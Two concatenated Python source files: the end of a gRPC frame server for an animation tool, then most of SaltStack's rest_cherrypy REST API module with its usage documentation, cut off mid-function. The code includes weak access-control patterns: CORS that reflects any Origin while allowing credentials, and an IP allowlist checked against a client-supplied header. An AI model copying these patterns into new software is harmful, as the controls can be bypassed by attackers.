mob_proto.style.stroke_width = float(mob_serialization["style"]["stroke_width"])
return response
class UpdateFrontendHandler(FileSystemEventHandler):
"""Logs all the events captured."""
def __init__(self, frame_server):
super().__init__()
self.frame_server = frame_server
def on_moved(self, event):
super().on_moved(event)
raise NotImplementedError("Update not implemented for moved files.")
def on_deleted(self, event):
super().on_deleted(event)
raise NotImplementedError("Update not implemented for deleted files.")
def on_modified(self, event):
super().on_modified(event)
module = get_module(config["input_file"])
all_scene_classes = get_scene_classes_from_module(module)
scene_classes_to_render = get_scenes_to_render(all_scene_classes)
scene_class = scene_classes_to_render[0]
# Get the old thread's ID.
old_thread_id = None
old_thread = self.frame_server.scene_thread
if hasattr(old_thread, "_thread_id"):
old_thread_id = old_thread._thread_id
if old_thread_id is None:
for thread_id, thread in threading._active.items():
if thread is old_thread:
old_thread_id = thread_id
# Stop the old thread.
res = ctypes.pythonapi.PyThreadState_SetAsyncExc(
old_thread_id, ctypes.py_object(SystemExit)
)
if res > 1:
ctypes.pythonapi.PyThreadState_SetAsyncExc(old_thread_id, 0)
print("Exception raise failure")
old_thread.join()
# Start a new thread.
self.frame_server.initialize_scene(scene_class, start_animation=1)
self.frame_server.scene.reached_start_animation.wait()
# Serialize data on Animations up to the target one.
animations = []
for scene in self.frame_server.keyframes:
if scene.animations:
animation_duration = scene.run_time
if len(scene.animations) == 1:
animation_name = str(scene.animations[0])
else:
animation_name = f"{str(scene.animations[0])}..."
else:
animation_duration = scene.duration
animation_name = "Wait"
animations.append(
renderserver_pb2.Animation(
name=animation_name,
duration=animation_duration,
)
)
# Reset the renderer.
with grpc.insecure_channel("localhost:50052") as channel:
stub = renderserver_pb2_grpc.RenderServerStub(channel)
request = renderserver_pb2.ManimStatusRequest(
scene_name=str(self.frame_server.scene), animations=animations
)
try:
stub.ManimStatus(request)
except grpc._channel._InactiveRpcError:
sp.Popen(config["js_renderer_path"])
def get(scene_class):
server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
frameserver_pb2_grpc.add_FrameServerServicer_to_server(
FrameServer(server, scene_class), server
)
server.add_insecure_port("localhost:50051")
return server
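# A rough usage sketch for get() above (illustrative only; scene_class is
# whatever Scene subclass you want to serve). The grpc server returned here
# still needs to be started and kept alive by the caller.
def _example_serve(scene_class):
    server = get(scene_class)
    server.start()  # begins serving on localhost:50051
    server.wait_for_termination()  # block until the server is stopped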
|
app.py
|
"""
A REST API for Salt
===================
.. py:currentmodule:: salt.netapi.rest_cherrypy.app
.. note::
This module is Experimental on Windows platforms and supports limited
configurations:
- doesn't support PAM authentication (i.e. external_auth: auto)
- doesn't support SSL (i.e. disable_ssl: True)
:depends:
- CherryPy Python module.
Note: there is a `known SSL traceback for CherryPy versions 3.2.5 through
3.7.x <https://github.com/cherrypy/cherrypy/issues/1298>`_. Please use
version 3.2.3 or the latest 10.x version instead.
:optdepends: - ws4py Python module for websockets support.
:client_libraries:
- Java: https://github.com/SUSE/salt-netapi-client
- Python: https://github.com/saltstack/pepper
:setup:
All steps below are performed on the machine running the Salt Master
daemon. Configuration goes into the Master configuration file.
1. Install ``salt-api``. (This step varies between OS and Linux distros.
Some package systems have a split package, others include salt-api in
the main Salt package. Ensure the ``salt-api --version`` output matches
the ``salt --version`` output.)
2. Install CherryPy. (Read the version caveat in the section above.)
3. Optional: generate self-signed SSL certificates.
Using a secure HTTPS connection is strongly recommended since Salt
eauth authentication credentials will be sent over the wire.
1. Install the PyOpenSSL package.
2. Generate a self-signed certificate using the
:py:func:`~salt.modules.tls.create_self_signed_cert` execution
function.
.. code-block:: bash
salt-call --local tls.create_self_signed_cert
4. Edit the master config to create at least one external auth user or
group following the :ref:`full external auth instructions <acl-eauth>`.
5. Edit the master config with the following production-ready example to
enable the ``rest_cherrypy`` module. (Adjust cert paths as needed, or
disable SSL (not recommended!).)
.. code-block:: yaml
rest_cherrypy:
port: 8000
ssl_crt: /etc/pki/tls/certs/localhost.crt
ssl_key: /etc/pki/tls/certs/localhost.key
6. Restart the ``salt-master`` daemon.
7. Start the ``salt-api`` daemon.
:configuration:
All available configuration options are detailed below. These settings
configure the CherryPy HTTP server and do not apply when using an external
server such as Apache or Nginx.
port
**Required**
The port for the webserver to listen on.
host : ``0.0.0.0``
The socket interface for the HTTP server to listen on.
debug : ``False``
Starts the web server in development mode. It will reload itself when
the underlying code is changed and will output more debugging info.
log_access_file
Path to a file to write HTTP access logs.
.. versionadded:: 2016.11.0
log_error_file
Path to a file to write HTTP error logs.
.. versionadded:: 2016.11.0
ssl_crt
The path to a SSL certificate. (See below)
ssl_key
The path to the private key for your SSL certificate. (See below)
ssl_chain
(Optional when using PyOpenSSL) the certificate chain to pass to
``Context.load_verify_locations``.
disable_ssl
A flag to disable SSL. Warning: your Salt authentication credentials
will be sent in the clear!
webhook_disable_auth : False
The :py:class:`Webhook` URL requires authentication by default but
external services cannot always be configured to send authentication.
See the Webhook documentation for suggestions on securing this
interface.
webhook_url : /hook
Configure the URL endpoint for the :py:class:`Webhook` entry point.
thread_pool : ``100``
The number of worker threads to start up in the pool.
socket_queue_size : ``30``
Specify the maximum number of HTTP connections to queue.
expire_responses : True
Whether to check for and kill HTTP responses that have exceeded the
default timeout.
.. deprecated:: 2016.11.9,2017.7.3,2018.3.0
The "expire_responses" configuration setting, which corresponds
to the ``timeout_monitor`` setting in CherryPy, is no longer
supported in CherryPy versions >= 12.0.0.
max_request_body_size : ``1048576``
Maximum size for the HTTP request body.
collect_stats : False
Collect and report statistics about the CherryPy server
Reports are available via the :py:class:`Stats` URL.
stats_disable_auth : False
Do not require authentication to access the ``/stats`` endpoint.
.. versionadded:: 2018.3.0
static
A filesystem path to static HTML/JavaScript/CSS/image assets.
static_path : ``/static``
The URL prefix to use when serving static assets out of the directory
specified in the ``static`` setting.
enable_sessions : ``True``
Enable or disable all endpoints that rely on session cookies. This can
be useful to enforce only header-based authentication.
.. versionadded:: 2017.7.0
app : ``index.html``
A filesystem path to an HTML file that will be served as a static file.
This is useful for bootstrapping a single-page JavaScript app.
Warning! If you set this option to a custom web application, anything
that uses cookie-based authentication is vulnerable to XSRF attacks.
Send the custom ``X-Auth-Token`` header instead and consider disabling
the ``enable_sessions`` setting.
.. versionchanged:: 2017.7.0
Add a proof-of-concept JavaScript single-page app.
app_path : ``/app``
The URL prefix to use for serving the HTML file specified in the ``app``
setting. This should be a simple name containing no slashes.
Any path information after the specified path is ignored; this is
useful for apps that utilize the HTML5 history API.
root_prefix : ``/``
A URL path to the main entry point for the application. This is useful
for serving multiple applications from the same URL.
.. _rest_cherrypy-auth:
Authentication
--------------
Authentication is performed by passing a session token with each request.
Tokens are generated via the :py:class:`Login` URL.
The token may be sent in one of two ways: as a custom header or as a session
cookie. The latter is far more convenient for clients that support cookies.
* Include a custom header named :mailheader:`X-Auth-Token`.
For example, using curl:
.. code-block:: bash
curl -sSk https://localhost:8000/login \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=pam
Copy the ``token`` value from the output and include it in subsequent requests:
.. code-block:: bash
curl -sSk https://localhost:8000 \\
-H 'Accept: application/x-yaml' \\
-H 'X-Auth-Token: 697adbdc8fe971d09ae4c2a3add7248859c87079'\\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
* Sent via a cookie. This option is a convenience for HTTP clients that
automatically handle cookie support (such as browsers).
For example, using curl:
.. code-block:: bash
# Write the cookie file:
curl -sSk https://localhost:8000/login \\
-c ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=auto
# Read the cookie file:
curl -sSk https://localhost:8000 \\
-b ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
Another example using the :program:`requests` library in Python:
.. code-block:: python
>>> import requests
>>> session = requests.Session()
>>> session.post('http://localhost:8000/login', json={
'username': 'saltdev',
'password': 'saltdev',
'eauth': 'auto',
})
<Response [200]>
>>> resp = session.post('http://localhost:8000', json=[{
'client': 'local',
'tgt': '*',
'fun': 'test.arg',
'arg': ['foo', 'bar'],
'kwarg': {'baz': 'Baz!'},
}])
>>> resp.json()
{u'return': [{
...snip...
}]}
.. seealso:: You can bypass the session handling via the :py:class:`Run` URL.
Usage
-----
This interface directly exposes Salt's :ref:`Python API <python-api>`.
Everything possible at the CLI is possible through the Python API. Commands are
executed on the Salt Master.
The root URL (``/``) is RPC-like in that it accepts instructions in the request
body for what Salt functions to execute, and the response contains the result
of those function calls.
For example:
.. code-block:: text
% curl -sSi https://localhost:8000 \
-H 'Content-type: application/json' \
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping"
}]'
HTTP/1.1 200 OK
Content-Type: application/json
[...snip...]
{"return": [{"jerry": true}]}
The request body must be an array of commands. Use this workflow to build a
command:
1. Choose a client interface.
2. Choose a function.
3. Fill out the remaining parameters needed for the chosen client.
The ``client`` field is a reference to the main Python classes used in Salt's
Python API. Read the full :ref:`Client APIs <client-apis>` documentation, but
in short:
* "local" uses :py:class:`LocalClient <salt.client.LocalClient>` which sends
commands to Minions. Equivalent to the ``salt`` CLI command.
* "runner" uses :py:class:`RunnerClient <salt.runner.RunnerClient>` which
invokes runner modules on the Master. Equivalent to the ``salt-run`` CLI
command.
* "wheel" uses :py:class:`WheelClient <salt.wheel.WheelClient>` which invokes
wheel modules on the Master. Wheel modules do not have a direct CLI
equivalent but they typically manage Master-side resources such as state
files, pillar files, the Salt config files, and the :py:mod:`key wheel module
<salt.wheel.key>` exposes similar functionality as the ``salt-key`` CLI
command.
Most clients have variants like synchronous or asynchronous execution as well as
others like batch execution. See the :ref:`full list of client interfaces
<client-interfaces>`.
Each client requires different arguments and sometimes has different syntax.
For example, ``LocalClient`` requires the ``tgt`` argument because it forwards
the command to Minions and the other client interfaces do not. ``LocalClient``
also takes ``arg`` (array) and ``kwarg`` (dictionary) arguments because these
values are sent to the Minions and used to execute the requested function
there. ``RunnerClient`` and ``WheelClient`` are executed directly on the Master
and thus do not need or accept those arguments.
Read the method signatures in the client documentation linked above, but
hopefully an example will help illustrate the concept. This example causes Salt
to execute two functions -- the :py:func:`test.arg execution function
<salt.modules.test.arg>` using ``LocalClient`` and the :py:func:`test.arg
runner function <salt.runners.test.arg>` using ``RunnerClient``; note the
different structure for each command. The results for both are combined and
returned as one response.
.. code-block:: text
% curl -b ~/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "test.arg",
"arg": ["positional arg one", "positional arg two"],
"kwarg": {
"keyword arg one": "Hello from a minion",
"keyword arg two": "Hello again from a minion"
}
},
{
"client": "runner",
"fun": "test.arg",
"keyword arg one": "Hello from a master",
"keyword arg two": "Runners do not support positional args"
}
]
'
HTTP/1.1 200 OK
[...snip...]
{
"return": [
{
"jerry": {
"args": [
"positional arg one",
"positional arg two"
],
"kwargs": {
"keyword arg one": "Hello from a minion",
"keyword arg two": "Hello again from a minion",
[...snip...]
}
},
[...snip; other minion returns here...]
},
{
"args": [],
"kwargs": {
"keyword arg two": "Runners do not support positional args",
"keyword arg one": "Hello from a master"
}
}
]
}
One more example, this time with more commonly used functions:
.. code-block:: text
curl -b /tmp/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "state.sls",
"kwarg": {
"mods": "apache",
"pillar": {
"lookup": {
"wwwdir": "/srv/httpd/htdocs"
}
}
}
},
{
"client": "runner",
"fun": "cloud.create",
"provider": "my-ec2-provider",
"instances": "my-centos-6",
"image": "ami-1624987f",
"delvol_on_destroy", true
}
]
'
HTTP/1.1 200 OK
[...snip...]
{
"return": [
{
"jerry": {
"pkg_|-install_apache_|-httpd_|-installed": {
[...snip full state return here...]
}
}
[...snip other minion returns here...]
},
{
[...snip full salt-cloud output here...]
}
]
}
Content negotiation
-------------------
This REST interface is flexible in what data formats it will accept as well
as what formats it will return (e.g., JSON, YAML, urlencoded).
* Specify the format of data in the request body by including the
:mailheader:`Content-Type` header.
* Specify the desired data format for the response body with the
:mailheader:`Accept` header.
We recommend the JSON format for most HTTP requests. urlencoded data is simple
and cannot express complex data structures -- and that is often required for
some Salt commands, such as starting a state run that uses Pillar data. Salt's
CLI tool can reformat strings passed in at the CLI into complex data
structures, and that behavior also works via salt-api, but that can be brittle
and since salt-api can accept JSON it is best just to send JSON.
Here is an example of sending urlencoded data:
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-b ~/cookies.txt \\
-d client=runner \\
-d fun='jobs.lookup_jid' \\
-d jid='20150129182456704682'
.. admonition:: urlencoded data caveats
* Only a single command may be sent per HTTP request.
* Repeating the ``arg`` parameter multiple times will cause those
parameters to be combined into a single list.
Note, some popular frameworks and languages (notably jQuery, PHP, and
Ruby on Rails) will automatically append empty brackets onto repeated
query string parameters. E.g., ``?foo[]=fooone&foo[]=footwo``. This is
**not** supported; send ``?foo=fooone&foo=footwo`` instead, or send JSON
or YAML.
A note about ``curl``
The ``-d`` flag to curl does *not* automatically urlencode data which can
affect passwords and other data that contains characters that must be
encoded. Use the ``--data-urlencode`` flag instead. E.g.:
.. code-block:: bash
curl -ksi http://localhost:8000/login \\
-H "Accept: application/json" \\
-d username='myapiuser' \\
--data-urlencode password='1234+' \\
-d eauth='pam'
Performance Expectations and Recommended Usage
==============================================
This module provides a thin wrapper around :ref:`Salt's Python API
<python-api>`. Executing a Salt command via rest_cherrypy is directly analogous
to executing a Salt command via Salt's CLI (which also uses the Python API) --
they share the same semantics, performance characteristics, and 98% of the same
code. As a rule-of-thumb: if you wouldn't do it at the CLI don't do it via this
API.
Long-Running HTTP Connections
-----------------------------
The CherryPy server is a production-ready, threading HTTP server written in
Python. Because it makes use of a thread pool to process HTTP requests it is
not ideally suited to maintaining large numbers of concurrent, synchronous
connections. On moderate hardware with default settings it should top-out at
around 30 to 50 concurrent connections.
That number of long-running, synchronous Salt processes is also not ideal. Like
at the CLI, each Salt command run will start a process that instantiates its
own ``LocalClient``, which instantiates its own listener to the Salt event bus,
and sends out its own periodic ``saltutil.find_job`` queries to determine if a
Minion is still running the command. Not exactly a lightweight operation.
Timeouts
--------
In addition to the above resource overhead for long-running connections, there
are the usual HTTP timeout semantics for the CherryPy server, any HTTP client
being used, as well as any hardware in between such as proxies, gateways, or
load balancers. rest_cherrypy can be configured not to time-out long responses
via the ``expire_responses`` setting, and both :py:class:`LocalClient
<salt.client.LocalClient>` and :py:class:`RunnerClient
<salt.runner.RunnerClient>` have their own timeout parameters that may be
passed as top-level keywords:
.. code-block:: bash
curl -b /tmp/cookies.txt -sSi localhost:8000 \\
-H 'Content-type: application/json' \\
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "test.sleep",
"kwarg": {"length": 30},
"timeout": 60
},
{
"client": "runner",
"fun": "test.sleep",
"kwarg": {"s_time": 30},
"timeout": 60
}
]
'
Best Practices
--------------
Given the performance overhead and HTTP timeouts for long-running operations
described above, the most effective and most scalable way to use both Salt and
salt-api is to run commands asynchronously using the ``local_async``,
``runner_async``, and ``wheel_async`` clients.
Running jobs asynchronously allows roughly 3x more commands per second to be
processed with ``LocalClient`` and 17x more with ``RunnerClient``, along with
much less network traffic and lower memory requirements. Job returns can
be fetched from Salt's job cache via the ``/jobs/<jid>`` endpoint, or they can
be collected into a data store using Salt's :ref:`Returner system <returners>`.
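As a rough sketch of that workflow, the following Python example (assuming the
third-party ``requests`` library and a hypothetical session token) dispatches a
command with ``local_async`` and then polls the ``/jobs/<jid>`` endpoint for
the returns:

.. code-block:: python

    import time

    import requests  # third-party HTTP client; assumed to be installed

    BASE = "http://localhost:8000"
    HEADERS = {"Accept": "application/json", "X-Auth-Token": "d40d1e1e"}  # hypothetical token

    # Dispatch asynchronously; the response only contains the jid and minion list.
    lowstate = [{"client": "local_async", "tgt": "*", "fun": "test.ping"}]
    jid = requests.post(BASE, json=lowstate, headers=HEADERS).json()["return"][0]["jid"]

    # Poll the job cache until returns show up (give up after ~30 seconds).
    for _ in range(30):
        ret = requests.get("{}/jobs/{}".format(BASE, jid), headers=HEADERS).json()["return"][0]
        if ret:
            print(ret)
            break
        time.sleep(1)
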
The ``/events`` endpoint is specifically designed to handle long-running HTTP
connections and it exposes Salt's event bus which includes job returns.
Watching this endpoint first, then executing asynchronous Salt commands second,
is the most lightweight and scalable way to use ``rest_cherrypy`` while still
receiving job returns in real-time. But this requires clients that can properly
handle the inherent asynchronicity of that workflow.
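A sketch of that events-first pattern in Python is shown below; it again
assumes the third-party ``requests`` library and a hypothetical session token,
and the SSE parsing is intentionally simplistic:

.. code-block:: python

    import json
    import threading

    import requests  # third-party HTTP client; assumed to be installed

    BASE = "http://localhost:8000"
    HEADERS = {"Accept": "application/json", "X-Auth-Token": "d40d1e1e"}  # hypothetical token

    def watch_events():
        # Subscribe to the event bus *before* dispatching any jobs.
        stream = requests.get(BASE + "/events", headers=HEADERS, stream=True)
        for line in stream.iter_lines(decode_unicode=True):
            if line and line.startswith("data: "):
                event = json.loads(line[len("data: "):])
                if "/ret/" in event["tag"]:  # a job return from some minion
                    print(event["tag"], event["data"].get("return"))

    watcher = threading.Thread(target=watch_events, daemon=True)
    watcher.start()

    # Dispatch asynchronously; returns arrive on the stream above.
    requests.post(
        BASE,
        json=[{"client": "local_async", "tgt": "*", "fun": "test.ping"}],
        headers=HEADERS,
    )
    watcher.join(timeout=30)  # keep the example alive long enough to see returns
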
Performance Tuning
------------------
The ``thread_pool`` and ``socket_queue_size`` settings can be used to increase
the capacity of rest_cherrypy to handle incoming requests. Keep an eye on RAM
usage as well as available file handles while testing changes to these
settings. As salt-api is a thin wrapper around Salt's Python API, also keep an
eye on the performance of Salt when testing.
Future Plans
------------
Now that Salt uses the Tornado concurrency library internally, we plan to
improve performance in the API by taking advantage of existing processes and
event listeners and to use lightweight coroutines to facilitate more
simultaneous HTTP connections and better support for synchronous operations.
That effort can be tracked in `issue 26505`__, but until that issue is closed
rest_cherrypy will remain the officially recommended REST API.
.. __: https://github.com/saltstack/salt/issues/26505
.. |req_token| replace:: a session token from :py:class:`~Login`.
.. |req_accept| replace:: the desired response format.
.. |req_ct| replace:: the format of the request body.
.. |res_ct| replace:: the format of the response body; depends on the
:mailheader:`Accept` request header.
.. |200| replace:: success
.. |400| replace:: bad or malformed request
.. |401| replace:: authentication required
.. |406| replace:: requested Content-Type not available
"""
import functools
import io
import itertools
import logging
import os
import signal
import tarfile
import time
from collections.abc import Iterator, Mapping
from multiprocessing import Pipe, Process
from urllib.parse import parse_qsl
import cherrypy # pylint: disable=import-error,3rd-party-module-not-gated
import salt
import salt.auth
import salt.exceptions
import salt.netapi
import salt.utils.args
import salt.utils.event
import salt.utils.json
import salt.utils.stringutils
import salt.utils.versions
import salt.utils.yaml
logger = logging.getLogger(__name__)
try:
from cherrypy.lib import ( # pylint: disable=import-error,3rd-party-module-not-gated
cpstats,
)
except AttributeError:
cpstats = None
logger.warning(
"Import of cherrypy.cpstats failed. Possible upstream bug: "
"https://github.com/cherrypy/cherrypy/issues/1444"
)
except ImportError:
cpstats = None
logger.warning("Import of cherrypy.cpstats failed.")
try:
# Imports related to websocket
from .tools import websockets
from . import event_processor
HAS_WEBSOCKETS = True
except ImportError:
websockets = type("websockets", (object,), {"SynchronizingWebsocket": None})
HAS_WEBSOCKETS = False
def html_override_tool():
"""
Bypass the normal handler and serve HTML for all URLs
The ``app_path`` setting must be non-empty and the request must ask for
``text/html`` in the ``Accept`` header.
"""
apiopts = cherrypy.config["apiopts"]
request = cherrypy.request
url_blacklist = (
apiopts.get("app_path", "/app"),
apiopts.get("static_path", "/static"),
)
if "app" not in cherrypy.config["apiopts"]:
return
if request.path_info.startswith(url_blacklist):
return
if request.headers.get("Accept") == "*/*":
return
try:
wants_html = cherrypy.lib.cptools.accept("text/html")
except cherrypy.HTTPError:
return
else:
if wants_html != "text/html":
return
raise cherrypy.InternalRedirect(apiopts.get("app_path", "/app"))
def salt_token_tool():
"""
If the custom authentication header is supplied, put it in the cookie dict
so the rest of the session-based auth works as intended
"""
x_auth = cherrypy.request.headers.get("X-Auth-Token", None)
# X-Auth-Token header trumps session cookie
if x_auth:
cherrypy.request.cookie["session_id"] = x_auth
def salt_api_acl_tool(username, request):
"""
.. versionadded:: 2016.3.0
Verifies user requests against the API whitelist (user/IP pairs)
in order to provide whitelisting for the API, similar to the
master, but enforced at the API level.
.. code-block:: yaml
rest_cherrypy:
api_acl:
users:
'*':
- 1.1.1.1
- 1.1.1.2
foo:
- 8.8.4.4
bar:
- '*'
:param username: Username to check against the API.
:type username: str
:param request: Cherrypy request to check against the API.
:type request: cherrypy.request
"""
failure_str = "[api_acl] Authentication failed for " "user %s from IP %s"
success_str = "[api_acl] Authentication successful for user %s from IP %s"
pass_str = "[api_acl] Authentication not checked for " "user %s from IP %s"
acl = None
# Salt Configuration
salt_config = cherrypy.config.get("saltopts", None)
if salt_config:
# Cherrypy Config.
cherrypy_conf = salt_config.get("rest_cherrypy", None)
if cherrypy_conf:
# ACL Config.
acl = cherrypy_conf.get("api_acl", None)
ip = request.remote.ip
if acl:
users = acl.get("users", {})
if users:
if username in users:
if ip in users[username] or "*" in users[username]:
logger.info(success_str, username, ip)
return True
else:
logger.info(failure_str, username, ip)
return False
elif username not in users and "*" in users:
if ip in users["*"] or "*" in users["*"]:
logger.info(success_str, username, ip)
return True
else:
logger.info(failure_str, username, ip)
return False
else:
logger.info(failure_str, username, ip)
return False
else:
logger.info(pass_str, username, ip)
return True
def salt_ip_verify_tool():
"""
If there is a list of restricted IPs, verify current
client is coming from one of those IPs.
"""
# This is overly cumbersome and crude,
# But, it's also safe... ish...
salt_config = cherrypy.config.get("saltopts", None)
if salt_config:
cherrypy_conf = salt_config.get("rest_cherrypy", None)
if cherrypy_conf:
auth_ip_list = cherrypy_conf.get("authorized_ips", None)
if auth_ip_list:
logger.debug("Found IP list: %s", auth_ip_list)
rem_ip = cherrypy.request.headers.get("Remote-Addr", None)
logger.debug("Request from IP: %s", rem_ip)
if rem_ip not in auth_ip_list:
logger.error("Blocked IP: %s", rem_ip)
raise cherrypy.HTTPError(403, "Bad IP")
def salt_auth_tool():
"""
Redirect all unauthenticated requests to the login page
"""
# Redirect to the login page if the session hasn't been authed
if "token" not in cherrypy.session: # pylint: disable=W8601
raise cherrypy.HTTPError(401)
# Session is authenticated; inform caches
cherrypy.response.headers["Cache-Control"] = "private"
def cors_tool():
"""
Handle both simple and complex CORS requests
Add CORS headers to each response. If the request is a CORS preflight
request swap out the default handler with a simple, single-purpose handler
that verifies the request and provides a valid CORS response.
"""
req_head = cherrypy.request.headers
resp_head = cherrypy.response.headers
# Always set response headers necessary for 'simple' CORS.
resp_head["Access-Control-Allow-Origin"] = req_head.get("Origin", "*")
resp_head["Access-Control-Expose-Headers"] = "GET, POST"
resp_head["Access-Control-Allow-Credentials"] = "true"
# Non-simple CORS preflight request; short-circuit the normal handler.
if cherrypy.request.method == "OPTIONS":
ac_method = req_head.get("Access-Control-Request-Method", None)
allowed_methods = ["GET", "POST"]
allowed_headers = [
"Content-Type",
"X-Auth-Token",
"X-Requested-With",
]
if ac_method and ac_method in allowed_methods:
resp_head["Access-Control-Allow-Methods"] = ", ".join(allowed_methods)
resp_head["Access-Control-Allow-Headers"] = ", ".join(allowed_headers)
resp_head["Connection"] = "keep-alive"
resp_head["Access-Control-Max-Age"] = "1400"
# Note: CherryPy expects a binary (bytes) response body on Python 3
cherrypy.response.body = b""
cherrypy.response.status = 200
# CORS requests should short-circuit the other tools.
cherrypy.serving.request.handler = None
# Needed to avoid the auth_tool check.
if cherrypy.request.config.get("tools.sessions.on", False):
cherrypy.session["token"] = True
return True
# Be conservative in what you send
# Maps Content-Type to serialization functions; this is a tuple of tuples to
# preserve order of preference.
ct_out_map = (
("application/json", salt.utils.json.dumps),
(
"application/x-yaml",
functools.partial(salt.utils.yaml.safe_dump, default_flow_style=False),
),
)
def hypermedia_handler(*args, **kwargs):
"""
Determine the best output format based on the Accept header, execute the
regular handler, and transform the output to the request content type (even
if it's an error).
:param args: Pass args through to the main handler
:param kwargs: Pass kwargs through to the main handler
"""
# Execute the real handler. Handle or pass-through any errors we know how
# to handle (auth & HTTP errors). Reformat any errors we don't know how to
# handle as a data structure.
try:
cherrypy.response.processors = dict(ct_out_map)
ret = cherrypy.serving.request._hypermedia_inner_handler(*args, **kwargs)
except (
salt.exceptions.AuthenticationError,
salt.exceptions.AuthorizationError,
salt.exceptions.EauthAuthenticationError,
salt.exceptions.TokenAuthenticationError,
):
raise cherrypy.HTTPError(401)
except salt.exceptions.SaltInvocationError:
raise cherrypy.HTTPError(400)
except (
salt.exceptions.SaltDaemonNotRunning,
salt.exceptions.SaltReqTimeoutError,
) as exc:
raise cherrypy.HTTPError(503, exc.strerror)
except salt.exceptions.SaltClientTimeout:
raise cherrypy.HTTPError(504)
except cherrypy.CherryPyException:
raise
except Exception as exc: # pylint: disable=broad-except
# The TimeoutError exception class was removed in CherryPy 12.0.0, but
# still check for TimeoutError and handle it when running CherryPy < 12.
# The check was moved down from the SaltClientTimeout except clause because
# a one-line if statement there throws a BaseException inheritance TypeError.
if hasattr(cherrypy, "TimeoutError") and isinstance(exc, cherrypy.TimeoutError):
raise cherrypy.HTTPError(504)
import traceback
logger.debug(
"Error while processing request for: %s",
cherrypy.request.path_info,
exc_info=True,
)
cherrypy.response.status = 500
ret = {
"status": cherrypy.response.status,
"return": "{}".format(traceback.format_exc())
if cherrypy.config["debug"]
else "An unexpected error occurred",
}
# Raises 406 if requested content-type is not supported
best = cherrypy.lib.cptools.accept([i for (i, _) in ct_out_map])
# Transform the output from the handler into the requested output format
cherrypy.response.headers["Content-Type"] = best
out = cherrypy.response.processors[best]
try:
response = out(ret)
return salt.utils.stringutils.to_bytes(response)
except Exception: # pylint: disable=broad-except
msg = "Could not serialize the return data from Salt."
logger.debug(msg, exc_info=True)
raise cherrypy.HTTPError(500, msg)
def hypermedia_out():
"""
Determine the best handler for the requested content type
Wrap the normal handler and transform the output from that handler into the
requested content type
"""
request = cherrypy.serving.request
request._hypermedia_inner_handler = request.handler
# If handler has been explicitly set to None, don't override.
if request.handler is not None:
request.handler = hypermedia_handler
def process_request_body(fn):
"""
A decorator to skip a processor function if process_request_body is False
"""
@functools.wraps(fn)
def wrapped(*args, **kwargs): # pylint: disable=C0111
if cherrypy.request.process_request_body is not False:
fn(*args, **kwargs)
return wrapped
@process_request_body
def urlencoded_processor(entity):
"""
Accept x-www-form-urlencoded data and reformat it into a Low State
data structure.
Since we can't easily represent complicated data structures with
key-value pairs, any more complicated requirements (e.g. compound
commands) must instead be delivered via JSON or YAML.
For example:
.. code-block:: bash
curl -si localhost:8000 -d client=local -d tgt='*' \\
-d fun='test.kwarg' -d arg='one=1' -d arg='two=2'
:param entity: raw POST data
"""
# cherrypy._cpreqbody.process_urlencoded doesn't preserve the raw
# "body", so we have to handle parsing the tokens using parse_qsl
urlencoded = entity.read()
try:
urlencoded = urlencoded.decode("utf-8")
except (UnicodeDecodeError, AttributeError):
pass
cherrypy.serving.request.raw_body = urlencoded
unserialized_data = {}
for key, val in parse_qsl(urlencoded):
unserialized_data.setdefault(key, []).append(val)
for key, val in unserialized_data.items():
if len(val) == 1:
unserialized_data[key] = val[0]
if len(val) == 0:
unserialized_data[key] = ""
# Parse `arg` and `kwarg` just like we do it on the CLI
if "kwarg" in unserialized_data:
unserialized_data["kwarg"] = salt.utils.args.yamlify_arg(
unserialized_data["kwarg"]
)
if "arg" in unserialized_data:
for idx, value in enumerate(unserialized_data["arg"]):
unserialized_data["arg"][idx] = salt.utils.args.yamlify_arg(value)
cherrypy.serving.request.unserialized_data = unserialized_data
@process_request_body
def json_processor(entity):
"""
Unserialize raw POST data in JSON format to a Python data structure.
:param entity: raw POST data
"""
# https://github.com/cherrypy/cherrypy/pull/1572
contents = io.BytesIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = salt.utils.stringutils.to_unicode(contents.read())
del contents
try:
cherrypy.serving.request.unserialized_data = salt.utils.json.loads(body)
except ValueError:
raise cherrypy.HTTPError(400, "Invalid JSON document")
cherrypy.serving.request.raw_body = body
@process_request_body
def yaml_processor(entity):
"""
Unserialize raw POST data in YAML format to a Python data structure.
:param entity: raw POST data
"""
# https://github.com/cherrypy/cherrypy/pull/1572
contents = io.BytesIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = salt.utils.stringutils.to_unicode(contents.read())
try:
cherrypy.serving.request.unserialized_data = salt.utils.yaml.safe_load(body)
except ValueError:
raise cherrypy.HTTPError(400, "Invalid YAML document")
cherrypy.serving.request.raw_body = body
@process_request_body
def text_processor(entity):
"""
Attempt to unserialize plain text as JSON
Some large services still send JSON with a text/plain Content-Type. Those
services are bad and should feel bad.
:param entity: raw POST data
"""
# https://github.com/cherrypy/cherrypy/pull/1572
contents = io.BytesIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = salt.utils.stringutils.to_unicode(contents.read())
try:
cherrypy.serving.request.unserialized_data = salt.utils.json.loads(body)
except ValueError:
cherrypy.serving.request.unserialized_data = body
cherrypy.serving.request.raw_body = body
def hypermedia_in():
"""
Unserialize POST/PUT data of a specified Content-Type.
The following custom processors all are intended to format Low State data
and will place that data structure into the request object.
:raises HTTPError: if the request contains a Content-Type that we do not
have a processor for
"""
# Be liberal in what you accept
ct_in_map = {
"application/x-www-form-urlencoded": urlencoded_processor,
"application/json": json_processor,
"application/x-yaml": yaml_processor,
"text/yaml": yaml_processor,
"text/plain": text_processor,
}
# Do not process the body for POST requests that have specified no content
# or have not specified Content-Length
if (
cherrypy.request.method.upper() == "POST"
